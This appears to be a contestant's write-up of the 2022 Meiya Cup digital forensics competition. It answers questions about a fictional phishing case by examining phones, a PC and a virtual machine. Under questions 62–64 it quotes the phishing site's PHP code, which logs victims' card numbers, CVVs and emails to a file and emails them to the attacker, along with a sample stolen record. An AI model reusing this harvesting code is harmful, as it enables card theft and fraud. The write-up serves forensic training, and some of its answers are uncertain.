2022美亚杯个人赛

案情简介

​ 2022 年 10 月，有市民因收到伪冒快递公司的电邮，不慎在犯罪嫌疑人架设的假网站上输入了个人信用卡资料，导致经济损失。经警方调查，发现其中一名受骗市民男子李大輝(TaiFai)的信用卡曾经被犯罪嫌疑人在市内的商店购物。后来警方根据IP地址，锁定及拘捕了一名男子林浚熙（阿熙ChunHei），并在他的居所发现了一批怀疑是作案用的电脑及手机。经取证调查后，警方发现阿熙除上述案件外，他还牵涉其他的一些犯罪活动。 警方的电子数据取证小组在现场作出初步调查，并对涉案设备进行了电子数据取证。请你根据得到的资料，协助将事件经过还原。

part 1 王晓琳的手机

1.[填空题] 王晓琳手机的IMEI’ 号是什么?(以阿拉伯数字回答)(1分)

直接看

352978115584444

2.[多选题] 王晓琳的手机安装了什么即时通讯软件(lnstant Messaging Apps)?(1分)

A. Signal

B. 微信(WeChat)

C. QQ

D. WhatsApp

E. LINE

直接在应用列表里面搜

ABD

3.[单选题] 王晓琳于什么日子和时间曾经通过即时通讯软件发出一个 PDF档案?(以时区UTC+8回答)(1分)

A.2022-09-30 17:39:53

B.2022-10-01 17:39:53

C.2022-09-30 18:30:28

D.2022-10-01 16:30:22

翻所有即时通讯的聊天记录找到

A

4.[填空题] 承上题，这个 PDF 档案的MD5哈希值Hash Value) 是什么?(以大写英文及阿拉伯数字回答)(1分)

拖到hashmyflies中或者火眼可以直接计算

ae0d6735bbe45b0b8f1ab7838623d9c8

5.[单选题] 王晓琳将这个“PDF 档案发给哪一个用户,而该用户的手机号码是什么?(1分)

A.85297663607

B.85259308538

C.85269707307

D.85246427813

直接可以看到

B

6.[多选题] 王晓琳发出这个，PDF 档案的原因是什么?(1分)

A. 寻求协助

B. 分享档案内容

C. 错误发出

D. 无法开启

从聊天记录我们可以看出来为了寻求帮助

A

7.[单选题] 承上题，分析王晓琳与上述用户的对话，他们的关系是什么?(1分)

A. 客户

B. 师生

C. 家人

D. 同事

从“列印問題 我明天返工再請教你”这句话可以看出是同事关系

D

8.[单选题] 王晓琳于何时要求上述用户删除 张照片?(1分)

A. 2022-10-06

B. 2022-09-28

C. 2022-09-30

D. 2022-10-03

D

9.[单选题] 承上题，该用户向王晓琳提出什么要求以删除这张照片?(1分)

A. 金钱

B. 毒品

C. 性服务

D. 加密货币

由上题易得

D

10.[单选题] 王晓琳的手机里有什么电子书籍(Electronic Book) ?(2分)

A. 三国演义

B. 红楼梦

C. 水浒传

D. 西游记
首先在应用列表里找到一个很想电子书的软件Apple Books，但是翻看半天没找到有关文本，然后采用火眼的全局搜索，成功搜出来了，再次感叹火眼的好用

A

11.[单选题] 王晓琳在这本电子书籍里最后对哪段文字加入了重点标示效果(Highlight)?(2分)

A. 卿有何妙计

B. 宝玉已是三杯过去了

C. 武松那日早饭罢

D. 就除他做个强马温罢

感觉这几句已经很明显了，但是为了保险起见，还是翻一下，没翻数据库（不会翻），直接全局搜索，运气比较好，搜出来了，答案很明显，

A

12.[多选题] 王晓的手机里有一个 MTR Mobile (港)的手机程序(Mobile App)。 检视其数据库(Database) 的数据，王晓琳于2022年10月11日 22:04 时将一行程加入书签(Bookmark)，这段行程的起点及终点站包括?(2分)

A. 尖沙咀

B. 红硒

C. 康城

D. 青衣

E. 沙田

首先建立时间索引，然后找到5个文件，发现都与MTR Mobile 这个软件有关系，然后其中有一个是数据库，点开看一下，然后转换时间戳，找于2022年10月11日 22:04 时将一行程加入书签，起点青衣，终点沙田

DE

13.[填空题] 王晓琳于2022年10月2日使用她的手机拍摄了多少张的照片?(以拉伯数字回答)(1分)

建立索引

90

14.[单选题] 检视王晓琳的手机照片，她于2022年10月2日到过什么地方?(1分)

A. 大潭郊游径

B. 城门畔塘径

C. 大榄麦理浩径

D. 京士柏卫理径

我们在图片中找到一张带有地名的图片

B

part 2 李大辉的手机

15.[单选题] 李大辉使用的是一台LG V10的手机，它的型号是什么?(1分)

A. LGH960C

B. LGH961N

C. LGH960H

D. LGH961C

E. LGH961D

直接看

B

16.[单选题] 李大辉的手机最常搜索的类别(Category) 是什么?(1分)

A. 护肤品

B. 旅游

C. 运动

D. 学校

看一遍所有的浏览器，得到

A

17.[填空题] 李大辉最近光顾了一家美丰快运公司，这快递件的单号是什么?(不要输入符号及空白，以阿拉伯数字回答)(1分）

搜关键词，然后发现都在Android.bin/分区57/data/下面，然后在淘宝对应的目录下没找到，猜测是不是在谷歌的相册里面，最终在 Android.bin/分区57/data/com.google.android.apps.photos/cache/glide_cache/eac522dddba27caabcd4181fd36b0eac29448f809088fc82a96a32deaccd3946中找到

或者翻找火眼文件分类中的图片

4567567812344567

18.[单选题] 李大辉收到的电邮中有一个钓鱼链结(Phishing Link)，这个链结的地址是什么?(1分)

A. 以上皆非

B. https://bit.ly/3yeARcO

C. https://bit.ly/5vM12

D. http://bit.ly/Hell0

总共有yahoo邮箱，微信里的QQ邮箱，还有Gmail,刚开始啥都没翻到，然后就去搜了https://bit.ly/，然后搜到一个mailstore.litahui18@gmail.com.db的数据库，然后找到https://bit.ly/3yeARcO

B

19.[单选题] 承上题，这封电邮是从哪个电邮地址寄出的?(1分)

A. 以上皆非

B. Cavinchow456@yahoo.com

C. 2020ChanChan@hotmail.com

D. 30624700Peter@proton.me

同一数据库下翻得

D

20.[单选题] 承上题，寄出这封电邮的IP地址是?(2分)

A. 以上皆非

B. 65.54.185.39

C. 10.13.105.56

D. 58.152.110.218

数据库翻遍了，没找到？？？看了wp，也找了资料，好多人都说无解

无解

21.[单选题] 李大辉手机有一个orderxlsx 的档案被加密了，解密钥匙是什么?(1分)

A. 2022 Nov!

B. 202211010

C. Nov2022!

D. P@sswOrd!

运气比较好，想着密码可能在图片、备忘录里，先翻了图片，看到一个很像密码的，试了一下，可以

​ C

22.[填空题]香港的街道上每一枝街灯都有编号。分析李大辉手机里的程序KMB 1933，哪一枝街灯在经度 Latitude) 22.4160270000，纬度(Longitude) 114.2139450000 附近，它的编号是什么?(以大写英及阿拉伯数字回答)(2分)

首先在基本信息里查看包名为 com.kmb.app1933，直接用包名找文件，然后在文件中翻找数据库KMB_20201208.db，找到经度 Latitude) 22.4160270000，纬度(Longitude) 114.2139450000

近灯柱CE1453

23.[填空题]李大辉的手机里有一张由该手机拍的照片，照片的元资料(Metadata) 曾被修改，这张照片的档案名是什么?(以大写英文及数字回答，不用回答副档名)(2分)

运气有点逆天，翻到的第一张图就是

20220922_152622.JPG

24.[单选题] 分析李大辉的手机里的资料，他在哪一间公司工作?(2分)

A. 美丽好化妆品公司

B. 步步高贸易公司

C. 盛大国际有限公司

D. 永恒化妆品公司

翻找文档和聊天记录，应该会有相关信息，在excel中找到一个Staff card LI taihui.xlsx的文件，打开一看是职员证

A

part 3 林浚熙的手机

25.[填空题] 林浚熙曾经以手机登录Google账户的验证码是什么?(不要输入符号，以大写英文及阿拉伯数字回答)(1分)

直接翻短信

G785186

26.[填空题] 林浚熙手机的 WhatsApp’ 号码是什么?(号码)@s.whatsapp.net? (以阿拉伯数字回答)(1分)

直接可以看到

85259308538

27.[单选题] 通过分析林浚熙手机的照片，判断他在何处偷拍王晓琳?(1分)

A. 交通工具

B. 郊野公园

C. 游泳池

D. 酒店房间

翻看相机，我们可以看到一个类似于偷拍的照片，然后我们可以查看其左右两张照片的时间，挨得很近，根据其左右两张照片的情况，可以看出偷拍地点为酒店房间（吐槽一下偷拍）

D

28.[填空题] 林浚熙曾经删掉自己拍摄的照片，这张照片的档案名(Filename) 是什么?(不要输入，以大写英文及阿拉伯数字回答。如Cat10.jpg，需回答CAT10JPG)(2分)

翻看删除的照片直接可以看到

IMG0444JPG

29.[填空题] 王晓琳曾经发送一个PDF档案予林浚熙，这个档案的文件签名(File Signature) 是什么?(以十六进制数字答首八位数值，如FOA1C5E1)(2分)

和3题呼应了，文件是staff A team.pdf,找到文件，拖入010 Editor得

D0 DF 11 E0

30.[填空题] 承上题，该PDF档案内包含一位曾经被骗的受害者资料。分析林熙手机的数据，这位受害者的英文名字是什么?(不要输入符号及空白，以大写英文回答)(2分)

文件直接打不开，这种可能是改了文件扩展名，搜了一下D0 DF 11 E0

可能是以下某一种类型：Microsoft Office 旧格式文档：

.doc(Microsoft Word 97-2003 文档)

.xls(Microsoft Excel 97-2003 工作簿)

.ppt(Microsoft PowerPoint 97-2003 演示文稿)

.msg(Microsoft Outlook 邮件文件)

试了一下，应该是.xls文件，打开后可以看到名单

不知道受害者是谁，有翻了一下聊天记录，对比

WONG SAI PING

31.[单选题] 分析林浚熙手机上的数据，他在2022年10月17日计划去什么地方?(2分)

A. 以上皆非

B. 荃湾站

C. 沙田站

D. 国际金融中心二期

有点不知道从哪里下手了，直接全搜一遍（注意繁体字转换），然后看到一个user.db的数据库，打开，把start_time时间戳转化一下刚好时间吻合

C

32.[填空题] 承上题，上述行程的结束时间是?(如答案为 1:01:59，需回答 160159)(2分)

直接看

124500

33.[填空题] 林浚熙的手机里，在2022年9月1日 或以后，哪一张照片是由其他手机拍摄的，而它的档案名是什么?(不要输入，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG)(2分)

首先对2022年9月1日 或以后的照片进行筛选，然后我们看到其中一张照片相簿名称： Exif Removed，猜测它应该是由其他手机拍摄的，答案应该是MG0438JPG

做到35题，发现不对，这张照片的传输方式在数据库里面是空白

换种方式，用图片Exif信息分析，可以看到拍照设备的型号，我们可以看到IMG 0422.HEIC，IMG 0446.HEIC，IMG 0420.HEIC，IMG 0421.HEIC设备是iPhone XS，其中在2022年9月1日或以后有IMG 0422.HEIC，IMG 0420.HEIC，IMG 0421.HEIC三张

IMG 0422.HEIC，IMG 0420.HEIC，IMG 0421.HEIC

34.[单选题] 根据照片的数据库Photos.sqlite) 资料，哪一个栏目标题(Column Header) 可以显示这张照片的接收方式?(2分)

A. ZRECEIVEMETHODIDENTIFIER

B. ZIMPORTEDFROMSOURCEIDENTIFIER

C. ZIMPORTEDBYBUNDLEIDENTIFIER

D. ZRECEIVEDFROMIDENTIFIER

问了一下AI

然后根据34题的问题，答案其实已经很明显了

C

35.[单选题] 承上题，这张照片通过什么方式接收?(2分)

A. 网页下载

B. 蓝牙传送

C. 以上皆非

D. WhatsApp软件传送

E. Signal软件传送

在数据库Photos.sqlite里面找IMG 0422.HEIC，IMG 0420.HEIC，IMG 0421.HEIC没找到

但是我们可以看到序号295，296，297对应的就是IMG 0422.HEIC，IMG 0420.HEIC，IMG 0421.HEIC，在表ZADDITIONALASSETATTRIBUTES中我们可以找到照片的名字和传输方式

C

36.[填空题] 承上题，这张照片原本的档案名(Original Filename) 是什么?不要输入，以大写英文及阿拉伯数字回答。如 Cat10,jpg，需回答CAT10JPG)(3分)

承上题

IMG 0383.HEIC，IMG 0381.HEIC，IMG 0383.HEIC

37.[填空题] 林熙手机里有一个备忘录(Notes)被上了锁，这个备忘录的名称是什么?(以大写英文及阿拉数字回答)(1分)

直接看

HALO

38.[填空题] 承上题，上述备忘录的内容有一串数字，它是什么?(以阿拉伯数字回答)(2分)

不会

part 3 林浚熙的计算机

39.[单选题] 林浚熙计算机(Computer) 的操作系统(Operating System) 版本是什么?(1分)

A. Windows 10 Pro for Workstations 21H2

B. Windows 10 Pro 22H2

C. Windows 10 Home 21H2

D. Windows 10 Pro for Workstations 21H1

火眼中直接查看只能看到一部分

仿真虚拟机可以看到

A

40.[填空题] 林浚照计算机安装了什么品牌的虚拟专用网络 Virtual Private Network - VPN)软件?(不要输入符号及空白，以大写英文及阿拉伯数字回答)(1分)

软件里面搜VPN

EXPRESSVPN

41.[填空题] 承上题，分析该虚拟专用网络的日志(Log)，他在哪天安装该虚拟专用网络?(如答案为 2022-12-29，需回答 20221229)(2分)

翻日志

!

20220915

42.[填空题] 检视林浚照计算机的数据，他使用哪种加密货币(Cryptocurrency) 以支付虚拟专用网络软件?以大写英文回答该加密货币的全名，如 BITCOIN)(1分)

在谷歌的历史记录里面翻出来了（这个例子给的…）

BITCOIN

43.[填空题] 林浚熙的加密贷钱包Cryptocurrency Wallet) 名称是什么?不要输入符号，以大写英文及阿拉伯数字回答2分)

刚开始并不知道怎么找，但是在虚拟机桌面上看到一个electrum的软件，打开发现是加密钱包

TELLAWIEH

44.[多选题] 林浚熙计算机里安装了哪个浏览器(Web Browser)? (1分)

A. Internet Explorer

B. Microsoft Edge

C. Tor Browser

D. Opera

E. Google Chrome

直接可以看到的有4个，但是怕火眼没分析全，又去搜了一下Opera，没有找到

ABCE

45.[单选题] 林浚熙使用浏览器 Google Chrome’ 曾经浏览最多的是哪 个网站? (1分)

A. https://gmail.com

B. https://mail.google.com/mail

C. https://web.whatsapp.com

D. https://facebook.com

可以看到访问次数，最多116次为 https://web.whatsapp.com

C

46.[多选题] 除了上述网站,林浚熙曾使用浏览器 Google Chrome’ 搜索过什么?(1分)

A. javascript教学

B. php sql教学

C. tor教学

D. docker image教学

E. electrum教学

可以看到都有教学二字，可以搜索一下，刚开始没搜到，没想到是“教學”

BCDE

47.[单选题] 林浚照的计算机安装了一个通讯软件Signal’，它的用戶資訊儲存路径是什么?(1分)

A. Users\HEINDesktop Signal

B. Users\HEI\AppData Roaming Signa

C. Program Files (x86)Signal

D. Users\user Roaming Signal

直接跳转源文件

B

48.[填空题] 通讯软件Signa’ 采用一个档案存放用户的聊天记录，它的档案名是什么?(不要输入，以大写英文及阿拉伯数字回答。如Cat10.jpg，需回答CAT10JPG)(2分)

同上

DB.SQLITE

49.[填空题] 承上题，对上档案进行分析，林发熙的联络人当中有多少人安装了Signal?(以阿拉伯数字回答)(3分)

Signal的数据库DB.SQLITE打不开，因为被加密了

参考了wp。在ChunHei_Desktop.E01/1/Users/HEI/AppData/Roaming/Signal/config.json中找到了数据库密码45cc1769003bb596166e0d5a01ad20bb056392cc690618764a5204da28476e1b

然后在DB Browser for SQLCipher.exe打开db.sqlite,输入x’45cc1769003bb596166e0d5a01ad20bb056392cc690618764a5204da28476e1b’

可以打开数据库

他有4个联系人，所有答案是4

4

50.[填空题] 林浚熙在“Signal’ 曾经与某人对话，那人的手机号码是什么? 需要与区码(Area Code) 一同答(以阿拉伯数字3分)

可以看到他与Rocky聊天，查找手机号

+85270711901

51.[多选题] 承上题，两人在Signal’ 的对话中有些讯息(Message) 包含附件，这些讯息的 ID包括?(2分)

A.5b9650fe-3bb6-4182-9900-f56177003672

B.46a8762b-78ea-49aa-a6f5-b24975ec189f

C.9729bf92-ab9c-45f7-8147-66234296aele

D.47233ffe-1a73-4b3d-b97c-626246ec3129

这道题有几个需要注意的地方，首先是两人的聊天Message，其次要包含附件

我们看到Message表中包含附件（hasAttachments）的只有2个，其中一条是Rocky发给He1，一条是He1发给Rocky，满足题意

BC

52.[填空题]承上题，林浚熙曾经于2022年10月20日转账（Transfer Money) 予上述对话人士,那次转账的参考编号是什么?(以大写英文及阿拉白数字回答)(3分)

直接翻聊天记录

N91088774024

53.[单选题] 林浚照的计算机安装了多少台虚拟机Virtual Machine - VM) ?(以阿拉伯数字回答)(1分)

A. 4

B. 1

C. 2

D. 3

翻嵌套镜像(其他是虚拟机的数据储存文件)

B

54.[单选题] 林浚熙的计算机里的虚拟机(VM) 存放在什么路径?(1分)

A. \Program Files\Virtual Machines

B. \User\HEI\Roaming\Virtual Machines\

C. \Users\Public\Documents\Virtual Machines

D.\Users\HEI\Documents\Virtual Machines

从虚拟机的存放路径我们可以看出来

D

55,[单选题] 虚拟机 (VM) 使用什么版本的作业系统(Operating System) ?(1分)

A. CentOs Linux 7.5.1804 (Core)

B. Ubuntu 22.04.1 LTS

C. CentOS Linux release 7.6.1810(Core)

D. Ubuntu 20.04.5 LTS

翻看 Ubuntu 64-bit.vmx可以看到

D

56.[多选题] 虚拟机(VM) 中的文件传输服务器(FTP Server) 有哪些用户?(2分)

A. nobody

B. root

C. admin

D. man

E. ftpuser

在虚拟机找到虚拟机的位置，然后在火眼中导出文件，再仿真后用虚拟机打开

输入命令行语句cat /etc/passwd

在火眼用户列表里面看到

ED

57.[多选题] 虚拟机设置了什么网页服务器(Web Server)? (2分)

A. NGINX

B. LIGHTTPD

C. WORDPRESS

D. APACHE

E. IIS

输入命令行语句

火眼中可以看到

AD

58.[单选题] 网页服务器目录内有图片档案，而此档案的储存位置是?(1分)

A. /var/www/html/post/src

B. /var/www/html/post/css

C. /var/www/html/post/vendor

D. /var/www/post

直接翻

B

59.[单选题] 分析网页服务器的网站数据，假网站的公司名称是什么?(1分)

A. Krick Global Logistics

B. Global Logistics

C. Krick Post Global Logistics

D. Krick Post

图片里面有

C

60.[单选题] 检视假网站首页的显示，AY806369745HK 代表什么?(1分)

A. 邮件号码

B. 邮件收费号码

C. 邮件序号

D. 邮件参考号码

查看网络接口的 IP 地址,然后在本地浏览器打开

D

61.[填空题] 分析假网站的资料，当受害人经假网站输入数据后，网站会产生一个档案，它的档案名是什么?(不要输入“，以大写英文及阿拉数字回答。如 Cat10.jpg，需回答CAT10JPG)(2分)

在火眼process.php中我们可以翻到$resultFile = “vu.txt”

打开vu.txt确实如此

vu.txt

62.[多选题] 分析假网站档案，process.php’ 源码(Source Code),推测此档案的用途可能是?(2分)

A. 改变函数

B. 产生档案

C. 发出邮件

D. 更新数据库

翻看源码

#数据记录到文件
date_default_timezone_set("Asia/Shanghai");
$dateTime = date("Y-m-d H:i:s");
$gDate = date("Y-m-d");
$gTime = date("H:i:s");
$browser = $_SERVER['HTTP_USER_AGENT'];
$resultFile = "vu.txt";

$fOpen = fopen($resultFile, "a");
fwrite($fOpen, "Date & Time: ".$dateTime."\n");
fwrite($fOpen, "Card Holder: ".$holdername."\n");
fwrite($fOpen, "Card no.: ".$cardno."\n");
fwrite($fOpen, "cvv: ".$cvv."\n");
fwrite($fOpen, "expire date: ".$exp_mth."/".$exp_yr."\n");
fwrite($fOpen, "Email: ".$email."@".$email_domn."\n");
fwrite($fOpen, "Browser Info: ".$browser."\n");
fwrite($fOpen, "\n"); //End of Entry
fclose($fOpen);

#电子邮件发送配置
use PHPMailer\PHPMailer\SMTP;
require_once __DIR__ . '/vendor/phpmailer/src/Exception.php';
$mail = new PHPMailer(true);

$mail->isSMTP();
$mail->Host = 'smtp.gmai1.com'; 
$mail->SMTPAuth = true;
$mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
$mail->Port = 587;
$mail->Username = 'chunhe11amm@gmail.com';
$mail->Password = 'rtatsceucpacocbdacs';
$mail->setFrom('chunhe11amm@gmail.com', 'Smith');
$mail->addAddress('chunhe11amm@gmail.com', 'Tyler');
$mail->IsHTML(true);
$mail->Subject = "vu";
$mail->Body = $message;
$mail->AltBody = ' ';
$mail->send();

BC

63.[填空题] 检视档案process.php’ 源码, 林浚照的电邮密码是?(以大写英文回答)(1分)

#电子邮件发送配置
use PHPMailer\PHPMailer\SMTP;
require_once __DIR__ . '/vendor/phpmailer/src/Exception.php';
$mail = new PHPMailer(true);

$mail->isSMTP();
$mail->Host = 'smtp.gmai1.com'; 
$mail->SMTPAuth = true;
$mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
$mail->Port = 587;
$mail->Username = 'chunhe11amm@gmail.com';
$mail->Password = 'rtatsceucpacocbdacs';#密码
$mail->setFrom('chunhe11amm@gmail.com', 'Smith');
$mail->addAddress('chunhe11amm@gmail.com', 'Tyler');
$mail->IsHTML(true);
$mail->Subject = "vu";
$mail->Body = $message;
$mail->AltBody = ' ';
$mail->send();

RTATSCEUCPACOCBDACS

64.[多选题] 分析档案process.php’ 源码, 它不会收集哪些资料?(2分)

A. GPS位置

B. 信用卡号码

C. 短讯验证码

D. 电话号码

E. 电邮地址

可以看到vu.txt记录的信息

Date & Time: 2022-10-06 10:40:47#时间戳
Card Holder: LI TA HUI#信用卡持卡人姓名
Card no.: 5540020788510118#信用卡号
cvv: 610#信用卡CVV码
expire date: 05/28#信用卡到期年月
Email: litahui18@gmail.com#电子邮件地址
Browser Info: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36#浏览器信息

ACD

65.[填空题] 虚拟机 (VM)安装了 Docker 程序，列出一个以5作为开端的 Doker"镜像 mage) ID (以阿拉伯数字及大写英文回答)（2分)

命令行语句

sudo systemctl start docker

docker images

5d58c024174d

66.[填空题] Docker 容器(Container)mysql’ 对外开放的通讯端口(Port) 是?(3分)

输入命令行语句

docker ps -a#显示所有的容器，包括已经停止的

docker start mysql#启动容器

docker ps#显示正在运行中的容器

图中可以看到容器内部的3306端口被映射到主机的43306端口

43306

67.[填空题] Docker容器mysql，用户 root’ 的密码是?(以大写英文及阿拉伯数字回答)(2分)

看了wp输入命令行语句

history | grep mysql#grep是文本搜索的作用

2wsx3edc

68.[填空题] Docker容器，mysql 里哪一个数据库储存了大量个人资料?(以大写英文回答)(3分)

在火眼中查找，可以看到是 customer这个表，而且在前面process.php源码中也出现过

CUSTOMER

69.[填空题]检视 Docker 容器’mysql’ 内数据库里的资料，李大辉的出生日期是?(如答案为 2022-12-29，需答 20221229) (3分)

直接看

19850214

70.[多选题] 通过取证调查结果进行分析(包括但不限于以上问题及情节)，林浚熙的行为涉及哪一种罪案?(5分)

A.传送儿童色情物品

B.抢劫

C.诈骗

D.勒索金钱

E.购买毒品

刚开始我选的是CD，看完wp后想到前面在电脑检材里面有段聊天记录，所有应该选CDE

CDE